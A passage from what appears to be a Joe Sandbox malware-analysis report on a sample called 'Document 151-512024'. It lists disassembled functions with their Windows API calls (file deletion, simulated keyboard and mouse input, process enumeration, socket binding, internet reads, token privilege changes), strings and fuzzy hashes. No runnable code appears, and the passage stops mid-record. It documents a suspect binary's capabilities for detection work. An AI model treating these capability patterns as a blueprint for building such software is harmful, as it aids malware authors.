Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: ffeabffcfaf4e8d3f5b96561472d217c062354290b26f5fd9ab770b0b1cc1ea4
Instruction ID: e773913560d0227cf8dc3c73ee22beec1e6e88612cf0b2fb140ebe2facc5438e
Opcode Fuzzy Hash: ffeabffcfaf4e8d3f5b96561472d217c062354290b26f5fd9ab770b0b1cc1ea4
Instruction Fuzzy Hash: 68C1E773904209AEDB25EF798841BAA7BADEF81310F18C56AE998D7251E7309E41C750

Function 009AD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00943AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00943A97,?,?,00942E7F,?,?,?,00000000), ref: 00943AC2

Part of subcall function 009AE199: GetFileAttributesW.KERNEL32(?,009ACF95), ref: 009AE19A

FindFirstFileW.KERNEL32(?,?), ref: 009AD420
DeleteFileW.KERNEL32(?,?,?,?), ref: 009AD470
FindNextFileW.KERNEL32(00000000,00000010), ref: 009AD481
FindClose.KERNEL32(00000000), ref: 009AD498
FindClose.KERNEL32(00000000), ref: 009AD4A1

Strings

\*.*, xrefs: 009AD3F2

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: c5a584131ba916ddb17633df2588f66583ea26abcea6a96ec33fbca7ff692c50
Instruction ID: 77cdc11c3ff8f1a317ae5ecb701f3054782456be26e14feacc9eff846fc751aa
Opcode Fuzzy Hash: c5a584131ba916ddb17633df2588f66583ea26abcea6a96ec33fbca7ff692c50
Instruction Fuzzy Hash: 71316D7105D3459FC204EF64D895DAFB7E8AED6304F444A1EF4D2921A1EB20EA09D7A3

Function 0097E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0097E645

Strings

1#QNAN, xrefs: 0097F84B
1#IND, xrefs: 0097F83D
1#SNAN, xrefs: 0097F844
1#INF, xrefs: 0097F852

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: aa6619792eaef5c8d7f3f88dcccad3c7f8eefeacbe6a3fbc6acf9bc4ae22205a
Instruction ID: 34fe2d2a80d6206975fa952a622192af50a1a4de7b48173b43e94b65250fd167
Opcode Fuzzy Hash: aa6619792eaef5c8d7f3f88dcccad3c7f8eefeacbe6a3fbc6acf9bc4ae22205a
Instruction Fuzzy Hash: 92C23F72E086298FDB25CF28DD507E9B7B9EB49304F1485EAD44DE7240E778AE818F40

Function 009B648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009B64DC
CoInitialize.OLE32(00000000), ref: 009B6639
CoCreateInstance.OLE32(009DFCF8,00000000,00000001,009DFB68,?), ref: 009B6650
CoUninitialize.OLE32 ref: 009B68D4

Strings

.lnk, xrefs: 009B64BA, 009B6524, 009B65E0

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 62dc87dffdb6a15cf6d6c78f3cf389846c4b667f63b872129f6ffb7a131a5fd6
Instruction ID: 133cc62c047e438a530757ea84903100511757d0d44336392307f851b159d3b0
Opcode Fuzzy Hash: 62dc87dffdb6a15cf6d6c78f3cf389846c4b667f63b872129f6ffb7a131a5fd6
Instruction Fuzzy Hash: DBD14871508201AFC314EF64C981EABB7E8FFD9714F00496DF5958B2A1EB71E909CB92

Function 009C22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 009C22E8

Part of subcall function 009BE4EC: GetWindowRect.USER32(?,?), ref: 009BE504

GetDesktopWindow.USER32 ref: 009C2312
GetWindowRect.USER32(00000000), ref: 009C2319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 009C2355
GetCursorPos.USER32(?), ref: 009C2381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009C23DF

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: af05287996720e985b0baff1ce0bb9ab9ef6adf47fb5dcde05c4a5c2413309c8
Instruction ID: ae12e0bd8db12b69942c0810c3c13171c941720b696abcfc163a7f689b4c9b1f
Opcode Fuzzy Hash: af05287996720e985b0baff1ce0bb9ab9ef6adf47fb5dcde05c4a5c2413309c8
Instruction Fuzzy Hash: 8C31CF72509356ABC720DF14D849F9BB7A9FF84710F00091EF985A7191DB34E948CB92

Function 009B9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 009B9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 009B9C8B

Part of subcall function 009B3874: GetInputState.USER32 ref: 009B38CB
Part of subcall function 009B3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009B3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 009B9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 009B9C75

Strings

*.*, xrefs: 009B9B5D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 3e20996ccdb2c9484a36c611e66265d2566910641b038201e794eb1b866643f7
Instruction ID: 8d18309fdc43cdcf59454f3e579843ddfe03d00925711b8db96f4e9f7410d716
Opcode Fuzzy Hash: 3e20996ccdb2c9484a36c611e66265d2566910641b038201e794eb1b866643f7
Instruction Fuzzy Hash: 8D41827195420AAFCF14DFB4C999BEE7BB8EF45320F204156E549A3291EB309E84CF60

Function 009AAA57 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 009AAAAC
SetKeyboardState.USER32(00000080), ref: 009AAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 009AAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 009AAB88

Strings

e31, xrefs: 009AAAEA

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID: e31
API String ID: 432972143-350795219
Opcode ID: 515099c2036b44e11e045e0e8b3e53db8dd1c07d41a2d2232c08869089798051
Instruction ID: f08c9688b8b7c0caf165024fb1b5ca5abdcbebd9752dc7f50774872384735d9c
Opcode Fuzzy Hash: 515099c2036b44e11e045e0e8b3e53db8dd1c07d41a2d2232c08869089798051
Instruction Fuzzy Hash: 5D312870A80208AFFF35CB65CC05BFA7BAAAB56320F04421BF581965D1D3798981D7F2

Function 00948060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 009483E8
Se31, xrefs: 00985D0F
ERCP, xrefs: 0094813C
VUUU, xrefs: 0094843C
VUUU, xrefs: 00985DF0
VUUU, xrefs: 009483FA

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID: ERCP$Se31$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1520504141
Opcode ID: 208e5dde1af0efa866d7278abb681af41d3e7fbb0c2a919874f641a516c869a5
Instruction ID: 97718df2c2a1f1fccd113e7fddbd4ee73616831b95bfd30d5214b0ab8fbce641
Opcode Fuzzy Hash: 208e5dde1af0efa866d7278abb681af41d3e7fbb0c2a919874f641a516c869a5
Instruction Fuzzy Hash: 5DA2C070E0021ACBDF24DF58C844BAEB7B5BF54314F2585AAE815AB385EB749D81CF90

Function 0095997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00959A4E
GetSysColor.USER32(0000000F), ref: 00959B23
SetBkColor.GDI32(?,00000000), ref: 00959B36

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 6e779de512641641b855bbabec6c2d5e7c220cb7d1a215b28dbdc64880600e70
Instruction ID: 1c3d95c9730caa871140ef948a184e4910dda083d0bf6cbbbcc58cba7118f748
Opcode Fuzzy Hash: 6e779de512641641b855bbabec6c2d5e7c220cb7d1a215b28dbdc64880600e70
Instruction Fuzzy Hash: 6EA13CB0118544FEFB24EBBE8C98FBB769DDB82302F14450AF912C6691CE299D05D372

Function 009C1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009C304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009C307A
Part of subcall function 009C304E: _wcslen.LIBCMT ref: 009C309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009C185D
WSAGetLastError.WSOCK32 ref: 009C1884
bind.WSOCK32(00000000,?,00000010), ref: 009C18DB
WSAGetLastError.WSOCK32 ref: 009C18E6
closesocket.WSOCK32(00000000), ref: 009C1915

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: f00d65ddc63cf7095a5bb90078f7537ae67df46c48852756066d12aaa5d47003
Instruction ID: ec4f6441d515ddccbdc4d94bb21d435e2fa02565565c8a8449218cf1e48dbf0d
Opcode Fuzzy Hash: f00d65ddc63cf7095a5bb90078f7537ae67df46c48852756066d12aaa5d47003
Instruction Fuzzy Hash: 6951C4B1A00210AFDB10EF24C886F2AB7E5AB85718F14849CF9159F3D3D775AD41CBA2

Function 009D1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 009D1CC0
IsWindowEnabled.USER32 ref: 009D1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 009D1CDB
IsIconic.USER32 ref: 009D1CE9
IsZoomed.USER32 ref: 009D1CF7

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: bf59d0ab83e8026853d57e8dad6597fd147d521216b25208fa5bdc40ab65f41d
Instruction ID: 59210a53e67fe7c1597ad3530328bc61a0f832f88b1cc8971c3d5a21e5573ec9
Opcode Fuzzy Hash: bf59d0ab83e8026853d57e8dad6597fd147d521216b25208fa5bdc40ab65f41d
Instruction Fuzzy Hash: 0821D3727D52016FD7208F2AC844B2A7BA9EF95315B18C05AE88A8B351D771EC42CB90

Function 009CA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 009CA6AC
Process32FirstW.KERNEL32(00000000,?), ref: 009CA6BA

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

Process32NextW.KERNEL32(00000000,?), ref: 009CA79C
CloseHandle.KERNEL32(00000000), ref: 009CA7AB

Part of subcall function 0095CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00983303,?), ref: 0095CE8A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: fe2400e9de525b6a184017c83f7064146d5a8883918eca8b4e989e1d77c62060
Instruction ID: 696cd26a0d1d9539aa12cc8a2dcc24747534ad5ef04e11962b26f2bcfa7b55c2
Opcode Fuzzy Hash: fe2400e9de525b6a184017c83f7064146d5a8883918eca8b4e989e1d77c62060
Instruction Fuzzy Hash: 7351F6B1908311AFD714EF25C886E6BBBE8AFC9754F00491DF98597262EB30D904CB92

Function 009BCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 009BCE89
GetLastError.KERNEL32(?,00000000), ref: 009BCEEA
SetEvent.KERNEL32(?,?,00000000), ref: 009BCEFE

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 11c6c656b0a5c2f2511444794582d1a1154ddfe6a38cf2576e64c6db98ea94be
Instruction ID: 269a8ac449736547499e0b46ebaff8ff334678bb6ef49bd0bb6023dd57c572bf
Opcode Fuzzy Hash: 11c6c656b0a5c2f2511444794582d1a1154ddfe6a38cf2576e64c6db98ea94be
Instruction Fuzzy Hash: 9C219DB1604306EBDB20DFA5CA48BA7B7FCEB40764F10481EE64692151E774EE44DBA4

Function 009A8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 009A82AA

Strings

(, xrefs: 009A82F0
|, xrefs: 009A82DA

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: b86e5288f15723e40b4a1dbcddbd3dc89c3446b1c9e2efee36ec7df74ab0f4f9
Instruction ID: 1001a2fc9acd817f53d54782b1e5202ecde5621f5a46de1936d9bcc194b5cba9
Opcode Fuzzy Hash: b86e5288f15723e40b4a1dbcddbd3dc89c3446b1c9e2efee36ec7df74ab0f4f9
Instruction Fuzzy Hash: B3322575A007059FCB28CF59C481A6AB7F4FF48710B15C56EE89ADB7A1EB70E941CB80

Function 009B5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009B5CC1
FindNextFileW.KERNEL32(00000000,?), ref: 009B5D17
FindClose.KERNEL32(?), ref: 009B5D5F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: b1c688b200847d438b8b8ea63fb796c0e69797425e964b0948a4b1f7ff4d3002
Instruction ID: 1a6fa8f0c97c10c5d6e92a8747c6e2e21e7d3fc09bee6799a5fe3c197e6a30cf
Opcode Fuzzy Hash: b1c688b200847d438b8b8ea63fb796c0e69797425e964b0948a4b1f7ff4d3002
Instruction Fuzzy Hash: 255168746046019FC714DF28C494F96B7E8FF89324F158A5EE99A8B3A1CB30E945CB91

Function 00972622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0097271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00972724
UnhandledExceptionFilter.KERNEL32(?), ref: 00972731

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c6285e0dcc4147ea9fbb872b30e9d3e9836474fde4db53f69c882e805b5f0bf2
Instruction ID: 63462bdc78335ab1f86129b8ffc04bf73dd26fe679fa21644433ba6bccf8a10a
Opcode Fuzzy Hash: c6285e0dcc4147ea9fbb872b30e9d3e9836474fde4db53f69c882e805b5f0bf2
Instruction Fuzzy Hash: DB31D67595121C9BCB21DF68DD897DDB7B8AF58310F5042EAE81CA7260E7309F818F44

Function 009B51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009B51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009B5238
SetErrorMode.KERNEL32(00000000), ref: 009B52A1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: c321237ec55ccf3eb6585a587fe23fbad959cb55ef02dc1a6dfeb9ee87737ee6
Instruction ID: d71567c21df6534b9b3bb7f3197c6c6296f9fee6a71101d8423f5ba7628b0d83
Opcode Fuzzy Hash: c321237ec55ccf3eb6585a587fe23fbad959cb55ef02dc1a6dfeb9ee87737ee6
Instruction Fuzzy Hash: 68315E75A00518DFDB00DF94D888FADBBB4FF49314F058099E805AB366DB35E856CB90

Function 009A16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0095FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00960668
Part of subcall function 0095FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00960685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009A170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009A173A
GetLastError.KERNEL32 ref: 009A174A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 67eef0284ab7dcd887a0874ef59554340efdf1df4297378c91e12ac7f962d05e
Instruction ID: 00eb6af701708f41d1fef2e58e75a6604f2f084af042f18a685b0a14019beb72
Opcode Fuzzy Hash: 67eef0284ab7dcd887a0874ef59554340efdf1df4297378c91e12ac7f962d05e
